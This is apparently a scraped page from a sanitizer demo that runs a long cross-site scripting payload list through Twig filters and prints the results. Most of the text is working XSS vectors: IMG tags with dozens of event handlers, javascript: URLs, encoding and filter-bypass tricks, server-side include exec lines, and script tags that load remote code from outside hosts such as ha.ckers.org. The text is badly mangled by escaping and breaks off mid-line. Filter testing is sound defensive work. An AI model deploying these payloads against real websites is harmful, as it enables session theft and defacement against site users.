//|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src:\\\'&lt;style/=this.=confirm&#40;1&#41;&gt;\\\'&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/&gt;&lt;input type=\\\"X\\\"&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/=prompt&#40;1&#41;\\r\\n&lt;/svg&gt;\\\'\\\'&lt;svg&gt;alert&#40;1&#41; {Opera}\\r\\n&lt;a &gt;&lt;button&gt;\\r\\n&lt;div =\\\'alert&#40;1&#41;\\\'&gt;DIV&lt;/div&gt;\\r\\n&lt;iframe =\\\"prompt&#40;1&#41;\\\"&gt;\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;var =\\\"prompt&#40;1&#41;\\\"&gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a &gt;Click Here&lt;/a&gt;\\r\\n&lt;img &gt;\\r\\n&lt;%&lt;!--\\\'%&gt;alert&#40;1&#41;;--&gt;\\r\\n\\\"&gt;X&lt;/a\\r\\n&lt;iframe/=\\\a\\\l\\\e\\\r\\\t(\\\'\\\a\\\') worksinIE&gt;\\r\\n~\\\'\\\a\\\' ; \\\t\\\h\\\r\\\o\\\w ~ \\\t\\\h\\\i\\\s. \\\a\\\l\\\e\\\r\\\t(~\\\'\\\a\\\')U+\\r\\n&lt;/object&gt;\\r\\n&lt;iframe src=\\\"data:text/html,\\\"&gt;&lt;/iframe&gt;\\r\\n&lt;a &gt;Click Me&lt;/a&gt;\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n\\\'&gt;//\\\\\\\\,&lt;\\\'&gt;\\\"&gt;\\\"&gt;\\\"*\\\"\\r\\n\\\'); alert&#40;\\\'XSS\\r\\nalert(1&#41;;\\r\\nalert&#40;\\\'XSS\\\'&#41;;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;alert&#40;\\\"XSS\\\"&#41;\\\"&gt;\\r\\n\\r\\nalert&#40;String.fromCharCode(88,83,83&#41;) \\r\\n&lt;img /&gt;\\r\\n&lt;style&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\';&lt;/style&gt;\\r\\n&lt;? echo(\\\'&lt;scr)\\\'; echo(\\\'ipt&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\'); ?&gt;\\r\\n&lt;marquee&gt;alert&#40;\\\'XSS\\\'&#41;&lt;/marquee&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n\\\"&gt;alert&#40;0&#41;\\r\\n\\r\\n&lt;/title&gt;alert&#40;/xss/&#41;\\r\\n&lt;/textarea&gt;alert&#40;/xss/&#41;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;font &gt;\\r\\n&lt;img &gt;\\&gt;\\/&gt;&lt;/a&gt;&lt;/&gt;&lt;img &gt;\\&gt;\\r\\n&lt;iframe&lt;?php echo chr(11)?&gt; =alert&#40;\\\'XSS\\\'&#41;&gt;&lt;/iframe&gt;\\r\\n\\\"&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\'\\\"&gt;&gt;alert&#40;\\\'XSS\\\'&#41;\\r\\n\\\'\\\"&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\\\\\"&gt;\\r\\nvar var = 1; alert&#40;var&#41;\\r\\n&lt;STYLE type=\\\"text/css\\\"&gt;BODY{background:url(\\\"(\\\'XSS\\\')\\\")}&lt;/STYLE&gt;\\r\\n&lt;?=\\\'alert&#40;\\\"XSS\\\"&#41;\\\'?&gt;\\r\\n&lt;IMG &gt;\\&gt; &lt;\\\"\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\nperl -e \\\'print \\\\\\\"&lt;SCR\\\\0IPT&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;&lt;/SCR\\\\0IPT&gt;\\\\\\\";\\\' &gt; out\\r\\nperl -e \\\'print \\\\\\\"&lt;IMG &gt;\\\\\\\";\\\' &gt; &gt;\\r\\n&lt;scrscriptipt&gt;alert&#40;1&#41;&lt;/scrscriptipt&gt;\\r\\n&lt;/br &gt;\\r\\nalert&#40;1&#41;\\r\\n\\\"&gt;&lt;BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\"XSS\\\"&#41;&gt;\\r\\n[color=red width=alert&#40;123&#41;)][color]\\r\\n&lt;BASE HREF=\\\"(\\\'XSS\\\');//\\\"&gt;\\r\\nExecute(MsgBox(chr(88)&chr(83)&chr(83)))&lt;\\r\\n\\\"&gt;&lt;/iframe&gt;alert&#40;123&#41;</p> <p>by zz | at 2021-08-19 09:46:16</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<DIV url((\\\'XSS\\\'))\\\">\\r\\n<DIV >\\r\\n<DIV url(&#1;(\\\'XSS\\\'))\\\">\\r\\n<DIV alert&#40;\\\'XSS\\\'&#41;);\\\">\\r\\n&lt;!--[if gte IE 4]><![endif]--&gt;\\r\\n&lt;BASE HREF=\\\"(\\\'XSS\\\');//\\\"&gt;\\r\\n&lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://ha.ckers.org/scriptlet.html\\\"&gt;&lt;/OBJECT&gt;\\r\\n&lt;!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js>\\\'\\\"--&gt;\\r\\n&lt;? echo(\\\'<SCR)\\\';echo(\\\'IPT>alert&#40;\\\"XSS\\\"&#41;\\\'); ?&gt;\\r\\n<IMG >\\>\\>\\>\\>\\>\\r\\n\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<A >XSS</A>\\r\\n0\\\\\\\"autofocus/=alert&#40;1&#41;-->&lt;video/&gt;\\\"-confirm&#40;3&#41;-\\\"\\r\\nveris-->group&lt;svg/&gt;<img >\\ >\\>[\\\" >\\>\\r\\n\\r\\n<scralert&#40;1&#41;&lt;scralert&#40;1&#41;\\r\\n&lt;sCRalert&#40;1&#41;\\r\\n&lt;a >test</a>\\r\\n\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\ >\\/>\\r\\n\\\"><h1>&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\\">123</h1>\\r\\n\\\"><h1>&lt;IFRAME SRC=# &gt;&lt;/IFRAME&gt;123</h1>\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# &gt;&lt;/IFRAME&gt;\\r\\n\\\"><h1>&lt;IFRAME SRC=# &gt;&lt;/IFRAME&gt;123</h1>\\r\\n\\\">&lt;/iframe&gt;&lt;iframe frameborder=\\\"0\\r\\n\\\"&gt;<h1>&lt;IFRAME width=\\\"420\\\" height=\\\"315\\\" SRC=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" &gt;&lt;/IFRAME&gt;123</h1>\\r\\n\\\"><h1>&lt;iframe width=\\\"420\\\" height=\\\"315\\\" src=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" allowfullscreen&gt;&lt;/iframe&gt;123</h1>\\r\\n><h1>&lt;IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" &gt;&lt;/IFRAME&gt;Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250\\r\\n&lt;IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" &gt;&lt;/IFRAME&gt;\\r\\n\\\"><h1>&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\\">123</h1>\\r\\n\\\"><h1>&lt;IFRAME SRC=# &gt;&lt;/IFRAME&gt;123</h1>\\r\\n&lt;iframe src=http://xss.rocks/scriptlet.html &lt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# &gt;&lt;/IFRAME&gt;\\r\\n&lt;iframe src=\\\" (1) \\\"&gt;\\r\\n&lt;svg&gt;&lt;style&gt;{font-family:\\\'&lt;iframe/&gt;\\\'\\r\\n&lt;input/&gt;&lt;isindex &gt;\\&gt;\\&gt;\\\"&gt;\\/&gt;\\r\\n&lt;svg&gt;\\r\\n&lt;iframe src=)&gt;\\r\\n&lt;form&gt;&lt;a &gt;X&lt;img/*/&gt;\\r\\n&lt;img/ &#11; &gt;\\r\\n&lt;form&gt;&lt;iframe &#11; src=\\\"(1)\\\"&#11; ;&gt;\\r\\n&lt;a &gt;X&lt;/a\\r\\nhttp://www.googlealert)\r\\n&lt;a &gt;XYZ&lt;/a\\r\\n&lt;img/&gt;alert&#40;String.fromCharCode(49&#41;)^__^\\r\\n&lt;/style &gt;&lt;input type=\\\"date\\\" &gt;\\r\\n&lt;form&gt;&lt;textarea &#13; &gt;\\r\\n\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;style/ &gt; alert &#40;1&#41;&gt;\\r\\n&lt;///style///&gt;&lt;span / &gt;SPAN\\r\\n&lt;img/&gt;&lt;svg&gt;&lt;style&gt;{-o-link-source:\\\'&lt;body/&gt;\\\'\\r\\n&#13;&lt;blink/&#13; &gt;OnMouseOver {Firefox & Opera}\\r\\n&lt;marquee &gt;^__^\\r\\n&lt;div/&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe// src=(1)\\r\\n//&lt;form/action=()&gt;&lt;input/type=\\\'submit\\\'&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\"&lt;iframe/src=@\\\"/ /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src:\\\'&lt;style/&gt;\\\'&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/&gt;&lt;input type=\\\"X\\\"&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/&gt;\\\'\\\'&lt;svg&gt;alert&#40;1&#41; {Opera}\\r\\n&lt;a &gt;&lt;button&gt;\\r\\n&lt;div &gt;DIV&lt;/div&gt;\\r\\n&lt;iframe &gt;\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;var &gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a &gt;Click Here&lt;/a&gt;\\r\\n&lt;img &gt;\\r\\n&lt;%&lt;!--\\\'%&gt;\\r\\n\\r\\n&lt;iframe/src \\\\/\\\\/ value=&lt;&gt;&lt;iframe/src=(1)\\r\\n&lt;input type=\\\"text\\\" value=`` &lt;div/&gt;X&lt;/div&gt;\\r\\nhttp://www.&lt;/iframe&gt;\\r\\n&lt;svg&gt;&lt;/iframe&gt;\\r\\n&lt;img &gt;\\&gt;&lt;/object&gt;\\r\\n&lt;meta http-equiv=\\\"refresh\\\" content=\\\"0;(1)\\\"/&gt;\\r\\n&lt;math&gt;&lt;a &gt;click\\r\\n&lt;embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always&gt;\\r\\n&lt;svg contentScriptType=text/vbs&gt;\\\"&gt;X&lt;/a\\r\\n&lt;iframe/ worksinIE&gt;\\r\\na=\\\a & /=/\\r\\n\r\\n&lt;object data=\\\alert&#40;1&#41;&gt;\\r\\n\\r\\n&lt;body/ alert&#40;1&#41;&gt;\\r\\n/*\\r\\n&lt;svg&gt; alert&#40;1&#41;\\r\\n&lt;a &gt;ClickMe\\r\\n alert&#40;1&#41; 1=2\\r\\n&lt;div/&gt; style=\\\"x:\\\"&gt;\\r\\n&lt;--`&lt;img/&gt; --!&gt;\\&gt;x&lt;/button&gt;\\r\\n\\\"&gt;&lt;img &gt;\\r\\n&lt;form&gt;&lt;button &gt;CLICKME\\r\\n&lt;math&gt;&lt;a &gt;click\\r\\n&lt;object data=PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe src=\\\%(base64)s\\\"&gt;\\r\\n&lt;embed src=\\\%(base64)s\\\"&gt;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;TABLE BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(javascript:alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\&#039;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\&#039;\\\\0029\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(&amp;#1;javascript:alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;width: expression(alert(\\\&#039;XSS\\\&#039;));\\\&quot;&gt;\\r\\n&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert(\\\&#039;XSS\\\&#039;);&lt;/SCRIPT&gt;&lt;![endif]--&gt;\\r\\n&lt;BASE HREF=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);//\\\&quot;&gt;\\r\\n&lt;OBJECT TYPE=\\\&quot;text/x-scriptlet\\\&quot; DATA=\\\&quot;http://ha.ckers.org/scriptlet.html\\\&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;&lt;SCR\\\&#039;\\\&quot;--&gt;&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\\&#039;\\\&quot;--&gt;\\r\\n&lt;? echo(\\\&#039;&lt;SCR)\\\&#039;;echo(\\\&#039;IPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&#039;); ?&gt;\\r\\n&lt;IMG SRC=\\\&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;Set-Cookie\\\&quot; Content=\\\&quot;USERID=&lt;SCRIPT&gt;alert(\\\&#039;XSS\\\&#039;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\&quot;CONTENT-TYPE\\\&quot; CONTENT=\\\&quot;text/html; charset=UTF-7\\\&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(\\\&#039;XSS\\\&#039;);+ADw-/SCRIPT+AD4-\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT =\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; \\\&#039;\\\&#039; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT \\\&quot;a=\\\&#039;&gt;\\\&#039;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=`&gt;` SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&#039;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;document.write(\\\&quot;&lt;SCRI\\\&quot;);&lt;/SCRIPT&gt;PT SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;A HREF=\\\&quot;http://66.102.7.147/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n0\\\\\\\&quot;autofocus/onfocus=alert(1)--&gt;&lt;video/poster/ error=prompt(2)&gt;\\\&quot;-confirm(3)-\\\&quot;\\r\\nveris--&gt;group&lt;svg/onload=alert(/XSS/)//\\r\\n#\\\&quot;&gt;&lt;img src=M onerror=alert(\\\&#039;XSS\\\&#039;);&gt;\\r\\nelement[attribute=\\\&#039;&lt;img src=x onerror=alert(\\\&#039;XSS\\\&#039;);&gt;\\r\\n[&lt;blockquote cite=\\\&quot;]\\\&quot;&gt;[\\\&quot; onmouseover=\\\&quot;alert(\\\&#039;RVRSH3LL_XSS\\\&#039;);\\\&quot; ]\\r\\n%22;alert%28%27RVRSH3LL_XSS%29//\\r\\njavascript:alert%281%29;\\r\\n&lt;w contenteditable id=x onfocus=alert()&gt;\\r\\nalert;pg(\\\&quot;XSS\\\&quot;)\\r\\n&lt;svg/onload=%26%23097lert%26lpar;1337)&gt;\\r\\n&lt;script&gt;for((i)in(self))eval(i)(1)&lt;/script&gt;\\r\\n&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;\\r\\n&lt;sCR&lt;script&gt;iPt&gt;alert(1)&lt;/SCr&lt;/script&gt;IPt&gt;\\r\\n&lt;a href=\\\&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\\\&quot;&gt;test&lt;/a&gt;\\r\\n%253Cscript%253Ealert(\\\&#039;XSS\\\&#039;)%253C%252Fscript%253E\\r\\n&lt;IMG SRC=x onload=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onafterprint=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onbeforeprint=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onbeforeunload=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onerror=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onhashchange=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onload=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onmessage=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ononline=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onoffline=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onpagehide=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onpageshow=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onpopstate=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onresize=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onstorage=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onunload=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onblur=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onchange=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x oncontextmenu=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x oninput=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x oninvalid=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onreset=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onsearch=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onselect=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onsubmit=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onkeydown=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onkeypress=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onkeyup=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onclick=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ondblclick=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onmousedown=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onmousemove=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onmouseout=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onmouseover=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onmouseup=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onmousewheel=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onwheel=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ondrag=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ondragend=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ondragenter=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ondragleave=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ondragover=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ondragstart=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ondrop=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onscroll=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x oncopy=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x oncut=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onpaste=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onabort=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x oncanplay=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x oncanplaythrough=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x oncuechange=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ondurationchange=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onemptied=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onended=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onerror=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onloadeddata=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onloadedmetadata=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onloadstart=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onpause=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onplay=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onplaying=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x 